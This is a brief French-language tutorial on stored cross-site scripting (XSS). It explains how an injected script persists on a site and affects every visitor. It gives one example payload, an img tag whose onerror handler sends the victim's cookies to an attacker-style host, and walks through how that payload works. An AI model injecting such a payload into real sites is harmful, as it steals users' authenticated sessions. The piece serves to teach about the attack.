Comprendre l'attaque XSS stockée
Une faille XSS (Cross-Site Scripting) stockée est une vulnérabilité qui permet à un attaquant d'injecter un script malveillant directement dans une base de données ou un élément persistant d'un site web.
Exemple d'exploit
Voici un exemple de code qui pourrait être injecté dans un champ vulnérable :
<img src="x" onerror="new Image().src='https://atackers.com/cookie?data='+document.cookie">
Comment ça fonctionne ?
Ce script fonctionne de la manière suivante :
- Une image est insérée avec une source invalide
src="x"
. - Lorsqu'une erreur de chargement survient, l'événement
onerror
est déclenché. - Un nouvel objet Image est créé et sa source est définie sur une URL contenant les cookies de la victime.
- Cette requête envoie les cookies de la victime à un serveur contrôlé par l'attaquant.
Conséquences
Une attaque XSS stockée est particulièrement dangereuse car :
- Elle affecte tous les utilisateurs visitant la page vulnérable.
- Les cookies volés peuvent contenir des sessions authentifiées.
- Elle peut être utilisée pour défigurer un site ou insérer d'autres exploits.
Comments